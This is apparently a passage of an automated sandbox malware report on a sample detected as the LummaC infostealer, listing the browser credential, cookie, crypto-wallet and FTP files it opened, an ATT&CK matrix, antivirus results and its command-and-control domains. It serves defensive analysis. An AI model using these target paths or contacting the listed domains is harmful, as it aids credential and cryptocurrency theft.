              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2556801144.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 2736, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory751
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager34
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets1
              Application Window Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials11
              File and Directory Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync223
              System Information Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.96.3
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown
                  thumbystriw.store
                  		unknown
                  		unknowntrue
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        presticitpo.storetrue
                          		unknown
                          necklacedmny.storetrue
                            		unknown
                            fadehairucw.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                crisiwarny.storetrue
                                  		unknown
                                  https://necklacedmny.store/apitrue
                                    		unknown
                                    scriptyprefej.storetrue
                                      		unknown
                                      navygenerayk.storetrue
                                        		unknown
                                        thumbystriw.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.microsoftfile.exe, 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573744183.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066838400.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575338025.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573224522.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572097729.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575405463.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572367724.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2556757347.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575066058.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2574473643.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572707975.0000000000D94000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store//tLfile.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://necklacedmny.store/api&file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://necklacedmny.store/api#file.exe, 00000000.00000002.3078545799.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074900273.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://necklacedmny.store/?tfile.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://x1.i.lencr.org/0file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://necklacedmny.store/api3file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://www.mozilla.orfile.exe, 00000000.00000003.2558090375.000000000561C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://necklacedmny.store:443/apifile.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://necklacedmny.store:443/apiKfile.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
